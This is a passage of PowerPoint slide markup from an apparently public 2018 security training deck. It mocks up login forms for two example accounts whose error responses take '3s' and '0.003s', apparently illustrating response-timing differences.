          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1926" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1927" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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31"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932"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933" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1934" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1945" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9602880" y="1552346"/>
            <a:ext cx="5178240" cy="4116701"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5178239" cy="4116700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1937" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5178240" cy="4116701"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5178239" cy="4116700"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1935" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5178240" cy="4116701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1936" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="203937" y="736769"/>
                <a:ext cx="4770366" cy="3207335"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1938" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288373" y="3089158"/>
              <a:ext cx="4557242" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBE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1939" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2147392" y="797312"/>
              <a:ext cx="839205" cy="473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2200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1940" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="248814" y="2643357"/>
              <a:ext cx="1159273" cy="422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800">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1941" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="310499" y="1880655"/>
              <a:ext cx="4557242" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1942" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="263405" y="1434854"/>
              <a:ext cx="1210061" cy="422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800">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1943" name="rich@pagerduty.com"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="445909" y="1953299"/>
              <a:ext cx="2716970" cy="473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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="914400"/>
              <a:r>
                <a:t>rich@pagerduty.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1944" name="*********************"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="355647" y="3203622"/>
              <a:ext cx="2438934" cy="473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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="914400"/>
              <a:r>
                <a:t>*********************</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946" name="3s"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11443555" y="6454239"/>
            <a:ext cx="1496890" cy="166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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1951" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8181835" y="8906308"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1947" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FF320A"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1948" name="Sorry, the information you entered is incorrect. Please try again."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FF320A"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Sorry, the information you entered is incorrect. Please try again.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1949" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF320A"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1950" name="!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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5"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956"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957" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1958" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1969" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9602880" y="1552346"/>
            <a:ext cx="5178240" cy="4116701"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5178239" cy="4116700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1961" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5178240" cy="4116701"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5178239" cy="4116700"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1959" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5178240" cy="4116701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1960" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="203937" y="736769"/>
                <a:ext cx="4770366" cy="3207335"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1962" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288373" y="3089158"/>
              <a:ext cx="4557242" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1963" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2147392" y="797312"/>
              <a:ext cx="839205" cy="473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2200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1964" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="248814" y="2643357"/>
              <a:ext cx="1159273" cy="422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800">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1965" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="310499" y="1880655"/>
              <a:ext cx="4557242" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1966" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="263405" y="1434854"/>
              <a:ext cx="1210061" cy="422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800">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1967" name="mrburns@pagerduty.com"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="445909" y="1953299"/>
              <a:ext cx="3291459" cy="473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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="914400"/>
              <a:r>
                <a:t>mrburns@pagerduty.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1968" name="*********************"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="355647" y="3203622"/>
              <a:ext cx="2438934" cy="473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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="914400"/>
              <a:r>
                <a:t>*********************</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1970" name="0.003s"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10207662" y="6454239"/>
            <a:ext cx="3968676" cy="166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0000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>0.003s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1975" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8181835" y="8906308"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1971" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FF320A"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1972" name="Sorry, the information you entered is incorrect. Please try again."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FF320A"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Sorry, the information you entered is incorrect. Please try again.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1973" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF320A"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1974" name="!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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9"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980"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981" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1982" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1983" name="rich@pagerduty.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381150" y="4743648"/>
            <a:ext cx="6908342"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sz="5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
